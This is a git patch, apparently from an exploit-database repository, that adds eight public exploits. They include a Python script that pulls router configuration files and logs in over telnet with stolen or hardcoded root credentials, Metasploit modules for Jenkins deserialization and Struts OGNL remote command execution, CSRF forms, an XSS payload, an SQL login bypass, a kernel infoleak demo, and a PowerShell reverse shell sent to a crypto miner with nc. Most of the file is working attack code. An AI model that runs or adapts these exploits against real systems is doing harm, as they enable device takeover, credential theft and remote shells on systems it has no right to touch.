From 5aca1b9763223d341a4ef808f1ae02b8103d0086 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 18 May 2018 05:01:49 +0000 Subject: [PATCH] DB: 2018-05-18 8 changes to exploits/shellcodes Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall Libuser - roothelper Privilege Escalation (Metasploit) Libuser - 'roothelper' Privilege Escalation (Metasploit) Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution Inteno IOPSYS 2.0 < 4.2.0 - 'p910nd' Remote Command Execution Nanopool Claymore Dual Miner 7.3 - Remote Code Execution Jenkins CLI - HTTP Java Deserialization (Metasploit) Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit) NodAPS 4.0 - SQL injection / Cross-Site Request Forgery Intelbras NCLOUD 300 1.0 - Authentication bypass SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery --- exploits/hardware/webapps/44637.py | 80 +++++++ exploits/linux/dos/44641.c | 76 +++++++ exploits/linux/remote/44642.rb | 350 +++++++++++++++++++++++++++++ exploits/linux/webapps/44640.txt | 62 +++++ exploits/multiple/remote/44643.rb | 117 ++++++++++ exploits/php/webapps/44636.txt | 44 ++++ exploits/php/webapps/44639.txt | 38 ++++ exploits/windows/remote/44638.txt | 25 +++ files_exploits.csv | 12 +- 9 files changed, 802 insertions(+), 2 deletions(-) create mode 100755 exploits/hardware/webapps/44637.py create mode 100644 exploits/linux/dos/44641.c create mode 100755 exploits/linux/remote/44642.rb create mode 100644 exploits/linux/webapps/44640.txt create mode 100755 exploits/multiple/remote/44643.rb create mode 100644 exploits/php/webapps/44636.txt create mode 100644 exploits/php/webapps/44639.txt create mode 100644 exploits/windows/remote/44638.txt diff --git a/exploits/hardware/webapps/44637.py b/exploits/hardware/webapps/44637.py new file mode 100755 index 000000000..78cf3778e --- /dev/null +++ b/exploits/hardware/webapps/44637.py @@ -0,0 +1,80 @@ +# coding: utf-8 +# Exploit Title: Intelbras NCloud Authentication bypass +# Date: 16/05/2018 +# Exploit Author: Pedro Aguiar - pedro.aguiar@kryptus.com +# Vendor Homepage: http://www.intelbras.com.br/ +# Software Link: http://www.intelbras.com.br/empresarial/wi-fi/para-sua-casa/roteadores/ncloud +# Version: 1.0 +# Tested on: Linux +# CVE : CVE-2018-11094 +# Description: As described here: https://blog.kos-lab.com/Hello-World/ the Ncloud 300 device does not properly +# enforce authentication, allowing an attacker to remotely download the configurations backup ('/cgi-bin/ExportSettings.sh'). +# The configurations backup file contains the web interface username and password. +# Also, there are hardcoded credentials in the telnet service (root:cary), in cases where root user does not exist, +# it was replaced by the web interface credentials. This exploit downloads the backup file and tries to use the credentials +# to log into the device using telnet. + +import sys +import requests +import telnetlib +import re + +def help(): + print 'Usage: ' + print 'python exploit.py http://192.168.0.1' + +def pop_shell(host, user, password): + if(user == "root"): + print '[+] Trying default credentials: root:cary' + else: + print '[+] Trying credentials obtained from /cgi-bin/ExportSettings.sh' + with open('NCLOUD_config.dat', "r") as f: + content = f.read() + user = content.split("Login=")[1].split("\n")[0] + password = content.split("Password=")[1].split("\n")[0] + #print 'User: '+ user + #print 'Password: '+ password + f.close() + try: + ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', host)[0] + tn = telnetlib.Telnet(ip, 23, timeout=10) + tn.expect(["WORKGROUP login:"], 5) + tn.write(user + "\r\n") + tn.expect(["Password:"], 5) + tn.write(password + "\r\n") + i = tn.expect(["Login incorrect"], 5) + if i[0] != -1: + raise ValueError('[-] Wrong credential') + tn.write("cat /proc/cpuinfo\r\n") + tn.interact() + + tn.close() + except Exception as e: + print e + if(user == "root"): + pop_shell(host, 'try', 'again') + +def exploit(host): + print '[*] Connecting to %s' %host + path = '/cgi-bin/ExportSettings.sh' + payload = 'Export=Salvar' + + response = requests.post(host + path, data=payload) + response.raise_for_status() + + if(response.status_code == 200 and "Login=" in response.text): + print '[+] Config download was successful' + print '[+] Saving backup file to NCLOUD_config.dat' + with open('NCLOUD_config.dat', "w") as f: + f.write(response.text) + f.close() + pop_shell(host, "root", "cary") +def main(): + if len(sys.argv) < 2 or not sys.argv[1].startswith('http://'): + help() + return + host = sys.argv[1] + exploit(host) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/linux/dos/44641.c b/exploits/linux/dos/44641.c new file mode 100644 index 000000000..ec4141d45 --- /dev/null +++ b/exploits/linux/dos/44641.c @@ -0,0 +1,76 @@ +/* +Commit 3a4d44b61625 ("ntp: Move adjtimex related compat syscalls to native +counterparts") removed the memset() in compat_get_timex(). Since then, the +compat adjtimex syscall can invoke do_adjtimex() with an uninitialized +->tai. If do_adjtimex() doesn't write to ->tai (e.g. because the arguments +are invalid), compat_put_timex() then copies the uninitialized ->tai field +to userspace. + +Demo: + + +$ cat leak_32.c +*/ + +#include +#include +#include +#include +#include +#include +#include + +/* from include/linux/timex.h */ +#define ADJ_ADJTIME 0x8000 + +int main(void) { + struct timex tx; + memset(&tx, 0, sizeof(tx)); + tx.modes = ADJ_ADJTIME; /* invalid, causes early bailout */ + int res = adjtimex(&tx); + assert(res == -1 && errno == EINVAL); + printf("0x%08x\n", (unsigned int)tx.tai); + return 0; +} + +/* +$ gcc -o leak_32 leak_32.c -Wall -m32 +$ for i in {0..10}; do sleep 1; ./leak_32; done +0x01a300b0 +0x0be8f6f0 +0x0610d5f0 +0x01fa0170 +0x0bf05670 +0x0bf05670 +0x0610d5f0 +0x0610cd70 +0x0610d5f0 +0x0610d5f0 + + +Fixed in master: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a0b98734479aa5b3c671d5190e86273372cab95 + + +Fix it by adding the memset() back. + +Fixes: 3a4d44b61625 ("ntp: Move adjtimex related compat syscalls to native counterparts") +Signed-off-by: Jann Horn +--- + kernel/compat.c | 1 + + 1 file changed, 1 insertion(+) + +diff --git a/kernel/compat.c b/kernel/compat.c +index 6d21894806b4..92d8c98c0f57 100644 +--- a/kernel/compat.c ++++ b/kernel/compat.c +@@ -34,6 +34,7 @@ int compat_get_timex(struct timex *txc, const struct compat_timex __user *utp) + { + struct compat_timex tx32; + ++ memset(txc, 0, sizeof(struct timex)); + if (copy_from_user(&tx32, utp, sizeof(struct compat_timex))) + return -EFAULT; + +-- +2.17.0.441.gb46fe60e1d-goog +*/ \ No newline at end of file diff --git a/exploits/linux/remote/44642.rb b/exploits/linux/remote/44642.rb new file mode 100755 index 000000000..a46ebbe14 --- /dev/null +++ b/exploits/linux/remote/44642.rb @@ -0,0 +1,350 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + STAGE1 = "aced00057372002b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e466c6174334d6170a300f47ee17184980300007870770400000002737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0003787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740008041ac080131d170678787371007e00090000000077040000000078737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001f636f6d2e73756e2e6a6e64692e6c6461702e4c646170417474726962757465c47b6b02a60583c00300034c000a62617365437478456e767400154c6a6176612f7574696c2f486173687461626c653b4c000a6261736543747855524c7400124c6a6176612f6c616e672f537472696e673b4c000372646e7400134c6a617661782f6e616d696e672f4e616d653b787200256a617661782e6e616d696e672e6469726563746f72792e42617369634174747269627574655d95d32a668565be0300025a00076f7264657265644c000661747472494471007e001778700074000077040000000078707400156c6461703a2f2f6c6f63616c686f73743a313233347372001a6a617661782e6e616d696e672e436f6d706f736974654e616d6517251a4b93d67afe0300007870770400000000787871007e000e707871007e000e78" + # java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections6 'touch /tmp/wtf' + STAGE2 = "aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000e746f756368202f746d702f777466740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878" + + SEARCH_REQUEST = 3 + SEARCH_RES_ENTRY = 4 + SEARCH_RES_DONE = 5 + ABANDON_REQUEST = 16 + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Jenkins CLI HTTP Java Deserialization Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on + the Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not + required to exploit this vulnerability. + + }, + 'Author' => + [ + 'Matthias Kaiser', # Original Vulnerability discovery + 'Alisa Esage', # Private Exploit + 'Ivan', # Metasploit Module Author + 'YSOSerial' #Stage 2 payload + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux', 'unix'], + 'Arch' => ARCH_CMD, + 'Targets' => [ [ 'Jenkins 2.31', {} ] ], + 'References' => + [ + ['CVE', '2016-9299'], + ['URL', 'https://github.com/jenkinsci-cert/SECURITY-218'], + ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16'], + ['URL', 'http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition'], + ['URL', 'https://github.com/frohoff/ysoserial'] + ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd' + } + }, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 16 2016' + )) + + register_options([ + OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']), + Opt::RPORT('8080'), + OptAddress.new('SRVHOST', [ true, "The local host to listen on for the ldap server. This must be an address on the local machine or 0.0.0.0", '127.0.0.1' ]), + OptPort.new('SRVPORT', [ true, "The local port to listen on for the ldap server.", 1389 ]), + OptAddress.new('LDAPHOST', [ true, "The ldap host the exploit will try to connect to ", '127.0.0.1' ]) + ]) + end + + def target_uri + begin + URI(datastore['TARGETURI']) + rescue ::URI::InvalidURIError + print_error "Invalid URI: #{datastore['TARGETURI'].inspect}" + raise Msf::OptionValidateError.new(['TARGETURI']) + end + end + + def normalize_uri(*strs) + new_str = strs * "/" + + new_str = new_str.gsub!("//", "/") while new_str.index("//") + + # Makes sure there's a starting slash + unless new_str[0,1] == '/' + new_str = '/' + new_str + end + + new_str + end + + def aseq(x, tag) + s = seq(x) + s.tag_class = :APPLICATION + s.tag = tag + s + end + + def seq(x) + OpenSSL::ASN1::Sequence.new(x) + end + + def int(x) + OpenSSL::ASN1::Integer.new(x) + end + + def string(x) + OpenSSL::ASN1::OctetString.new(x) + end + + def set(x) + OpenSSL::ASN1::Set.new(x) + end + + def enum(x) + OpenSSL::ASN1::Enumerated.new(x) + end + + + def java_string(s) + length = s.length + + packed_length = [length].pack("S>") + + "#{packed_length}#{s}" + end + + def search_res_done(message_id) + s = seq([ + int(message_id), + aseq([enum(0), string(""), string("")], SEARCH_RES_DONE) + ]) + s.to_der + end + + def make_stage2(command) + [STAGE2].pack("H*").gsub("\x00\x0Etouch /tmp/wtf", java_string(command)) + end + + + def make_stage2_reply(command, message_id) + + java_class_name_attributes = seq([string("javaClassName"), set([string("WTF")])]) + java_serialized_data_attributes = seq([string("javaSerializedData"), set([string(make_stage2(command))])]) + attributes = seq([java_class_name_attributes, java_serialized_data_attributes]) + s = seq([ + int(message_id), + aseq([string("cn=wtf, dc=example, dc=com"), attributes], SEARCH_RES_ENTRY)]) + s.to_der + end + + + + def make_stage1(ldap_url) + [STAGE1].pack("H*").gsub("\x00\x15ldap://localhost:1234", java_string(ldap_url)) + end + + + def read_ldap_packet(socket) + + buffer = "" + + bytes = socket.read(2) + if bytes[0] != "0" + raise "NOT_LDAP: #{bytes.inspect} #{bytes[0]}" + end + + buffer << bytes + + length = bytes[1].ord + if (length & (1<<7)) != 0 + length_bytes_length = length ^ (1<<7) + + length_bytes = socket.read(length_bytes_length) + buffer << length_bytes + length = length_bytes.bytes.reduce(0) {|c, e| (c << 8) + e} + end + + buffer << socket.read(length) + buffer + end + + + def write_chunk(socket, chunk) + socket.write(chunk.bytesize.to_s(16) + "\r\n") + socket.write(chunk) + socket.write("\r\n") + end + + def exploit + uuid = SecureRandom.uuid + + ldap_port = datastore["SRVPORT"] + ldap_host = datastore["SRVHOST"] + ldap_external_host = datastore["LDAPHOST"] + + command = payload.encoded + host = datastore["RHOST"] + + ldap = TCPServer.new(ldap_host, ldap_port) + + cli_path = normalize_uri(target_uri.path, "cli") + + begin + + download = connect() + + begin + + download.write("POST #{cli_path} HTTP/1.1\r\n" + + "Host: #{host}\r\n" + + "User-Agent: curl/7.36.0\r\n" + + "Accept: */*\r\n" + + "Session: #{uuid}\r\n" + + "Side: download\r\n" + + "Content-Length: 0\r\n" + + "Content-Type: application/x-www-form-urlencoded\r\n\r\n") + + download.read(20) + + upload = connect() + begin + upload.write("POST #{cli_path} HTTP/1.1\r\n" + + "Host: #{host}\r\n" + + "User-Agent: curl/7.36.0\r\n" + + "Accept: */*\r\n" + + "Session: #{uuid}\r\n" + + "Side: upload\r\n" + + "Content-type: application/octet-stream\r\n" + + "Transfer-Encoding: chunked\r\n\r\n") + + write_chunk(upload, "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=") + write_chunk(upload, "\00\00\00\00") + + upload.flush + + stage1 = make_stage1("ldap://#{ldap_external_host}:#{ldap_port}") + + chunk_header = [stage1.bytesize].pack("S>") + write_chunk(upload, chunk_header + stage1) + + upload.flush + + client = ldap.accept + begin + + # this hardcodes an ldap conversation + + # read bindRequest + read_ldap_packet(client) + + # write bindResponse + client.write(["300c02010161070a010004000400"].pack("H*")) + + # read searchRequest + read_ldap_packet(client) + + # write searchResEntry + client.write(["3034020102642f04066f753d777466302530230411737562736368656d61537562656e747279310e040c636e3d737562736368656d61"].pack("H*")) + + # write searchResDone + client.write(search_res_done(2)) + + # read abandonReqeust or searchRequest + bytes = read_ldap_packet(client) + packet = OpenSSL::ASN1.decode(bytes) + + # abandonRequest packet is sometimes sent + # so we distinguish between abandonRequest/searchRequest + + tag = packet.value[1].tag + if tag == ABANDON_REQUEST + + bytes = read_ldap_packet(client) + packet = OpenSSL::ASN1.decode(bytes) + tag = packet.value[1].tag + end + + if tag == SEARCH_REQUEST + + message_id = packet.value[0].value.to_int + # write searchResEntry + client.write(make_stage2_reply(command, message_id)) + + # write searchResDone + client.write(search_res_done(message_id)) + else + raise "Unexpected packet: #{tag}" + end + + client.flush + ensure + client.close + end + ensure + upload.close + end + ensure + download.close + end + + ensure + ldap.close + end + end + + def check + result = Exploit::CheckCode::Safe + + begin + if vulnerable? + result = Exploit::CheckCode::Vulnerable + end + rescue Msf::Exploit::Failed => e + vprint_error(e.message) + return Exploit::CheckCode::Unknown + end + + result + end + + def vulnerable? + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path) + }) + unless res + fail_with(Failure::Unknown, 'The connection timed out.') + end + + http_headers = res.headers + + http_headers['X-Jenkins'] && http_headers['X-Jenkins'] <= "2.31" + end + + # Connects to the server, creates a request, sends the request, + # reads the response + # + # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi. + # + def send_request_cgi(opts={}, timeout = 20) + + begin + c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT']) + c.connect + r = c.request_cgi(opts) + c.send_recv(r, timeout) + rescue ::Errno::EPIPE, ::Timeout::Error + nil + end + end + +end \ No newline at end of file diff --git a/exploits/linux/webapps/44640.txt b/exploits/linux/webapps/44640.txt new file mode 100644 index 000000000..16094f000 --- /dev/null +++ b/exploits/linux/webapps/44640.txt @@ -0,0 +1,62 @@ +# Exploit Title: Powerlogic Schneider Electric IONXXXX Series - Cross-Site Request Forgery +# Date: 2018-05-17 +# Exploit Author: t4rkd3vilz +# Vendor Homepage: http://www.schneider-electric.com/ +# Version: ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, PM5XXX series. +# Tested on: All Version +# CVE : CVE-2016-5809 + +# PoC + + +
+select name="PMLSel_0x7800"> + + + + + + + + + + + + + + + + + + + + + + + + + + +
\ No newline at end of file diff --git a/exploits/multiple/remote/44643.rb b/exploits/multiple/remote/44643.rb new file mode 100755 index 000000000..3a38998e9 --- /dev/null +++ b/exploits/multiple/remote/44643.rb @@ -0,0 +1,117 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution', + 'Description' => %q{ This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value. }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'icez ', + 'Nixawk', + 'xfer0' + ], + 'References' => [ + [ 'CVE', '2017-9791' ], + [ 'BID', '99484' ], + [ 'EDB', '42324' ], + [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-048' ] + ], + 'Privileged' => true, + 'Targets' => [ + [ + 'Universal', { + 'Platform' => %w{ linux unix win }, + 'Arch' => [ ARCH_CMD ] + } + ] + ], + 'DisclosureDate' => 'Jul 07 2017', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/integration/saveGangster.action' ]), + OptString.new('POSTPARAM', [ true, 'The HTTP POST parameter', 'name' ]) + ] + ) + end + + def send_struts_request(ognl) + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + uri = normalize_uri(datastore['TARGETURI']) + + data = { + datastore['POSTPARAM'] => ognl, + 'age' => var_a, + '__checkbox_bustedBefore' => 'true', + 'description' => var_b + } + + resp = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + 'vars_post' => data + }) + + if resp && resp.code == 404 + fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') + end + resp + end + + def check + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + ognl = "%{'#{var_a}' + '#{var_b}'}" + + begin + resp = send_struts_request(ognl) + rescue Msf::Exploit::Failed + return Exploit::CheckCode::Unknown + end + + if resp && resp.code == 200 && resp.body.include?("#{var_a}#{var_b}") + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + resp = exec_cmd(payload.encoded) + unless resp and resp.code == 200 + fail_with(Failure::Unknown, "Exploit failed.") + end + + print_good("Command executed") + print_line(resp.body) + end + + def exec_cmd(cmd) + ognl = "%{(#_='multipart/form-data')." + ognl << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." + ognl << "(#_memberAccess?(#_memberAccess=#dm):" + ognl << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." + ognl << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." + ognl << "(#ognlUtil.getExcludedPackageNames().clear())." + ognl << "(#ognlUtil.getExcludedClasses().clear())." + ognl << "(#context.setMemberAccess(#dm))))." + ognl << "(#cmd='#{cmd}')." + ognl << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." + ognl << "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())." + ognl << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." + ognl << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" + + send_struts_request(ognl) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/44636.txt b/exploits/php/webapps/44636.txt new file mode 100644 index 000000000..8cf731bf8 --- /dev/null +++ b/exploits/php/webapps/44636.txt @@ -0,0 +1,44 @@ +# Exploit Title: Online Booking system - NodAPS 4.0 - 'search' SQL injection / Cross-Site Request Forgery +# Date: 2018-05-16 +# Exploit Author: Borna nematzadeh (L0RD) +# Vendor Homepage: https://codecanyon.net/item/appointment-management-system-nodaps/16197805?s_rank=1535 +# Version: 4.0 +# Tested on: windows +================================================ +# POC 1 : SQLi + + +# test : test.com/en/providers?search=' +# Description: Put ' in the search parameter and you will have SQL syntax error. +You can use "extractvalue()" or "updatexml()" functions to get data from database. + +================================================ +# POC 2 : CSRF + +# Description: An issue was discovered in Online Booking system - NodAPS 4.0 script. +With Cross-site request forgery (CSRF) vulnerability , attacker can hijack the authentication of users remotely. + +================================================ + +# Exploit : + + + + CSRF POC + + +
+ + + + + + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/44639.txt b/exploits/php/webapps/44639.txt new file mode 100644 index 000000000..1c4224ae6 --- /dev/null +++ b/exploits/php/webapps/44639.txt @@ -0,0 +1,38 @@ +# Exploit Title: SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass +# Date: 2018-05-17 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/supercom-online-shopping-ecommerce-cart/17085987?s_rank=1442 +# Version: 1 +# Tested on: Kali linux + +# Description: SuperCom - Online Shopping Ecommerce Cart 1 suffers from multiple vulnerabilities : +# POC 1 : Persistent cross site scripting : + +1) After creating an account , go to your profile. +2) Navigate to "Update profile" and put this payload : +"/> +3) You will get an alert box in the page . + +# POC 2 : CSRF : Attacker can change user's authentication directly : + + + + CSRF POC + + +
+ + + +
+ + + + +# POC 3 : Authentication bypass : +Path : /admin +Username : ' or 0=0 # +Password : anything \ No newline at end of file diff --git a/exploits/windows/remote/44638.txt b/exploits/windows/remote/44638.txt new file mode 100644 index 000000000..647e6fa0b --- /dev/null +++ b/exploits/windows/remote/44638.txt @@ -0,0 +1,25 @@ +# Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution +# Date: 2018/02/09 +# Exploit Author: ReverseBrain +# Vendor Homepage: https://nanopool.org/ +# Software Link: https://github.com/nanopool/Claymore-Dual-Miner +# Version: 7.3 and later +# Tested on: Windows, Linux +# CVE : 2018-1000049 + +Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234: + +powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" + +Convert it into hexadecimal and paste it on the second parameter inside this string: + +echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v + +Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"} +string to the miner. + +echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v + +You got the shell! + +This exploit works also on Linux, just substitute reboot.bat with reboot.bash or reboot.sh. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b22410737..f4d8d6993 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5972,6 +5972,7 @@ id,file,description,date,author,type,platform,port 44615,exploits/windows/dos/44615.cpp,"2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service",2018-05-11,anhkgg,dos,windows, 44619,exploits/windows/dos/44619.cpp,"2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service",2018-05-14,anhkgg,dos,windows, 44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios, +44641,exploits/linux/dos/44641.c,"Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall",2018-05-17,"Google Security Research",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9714,7 +9715,7 @@ id,file,description,date,author,type,platform,port 44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows, 44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows, 44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows, -44633,exploits/linux/local/44633.rb,"Libuser - roothelper Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux, +44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16490,7 +16491,10 @@ id,file,description,date,author,type,platform,port 44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php, 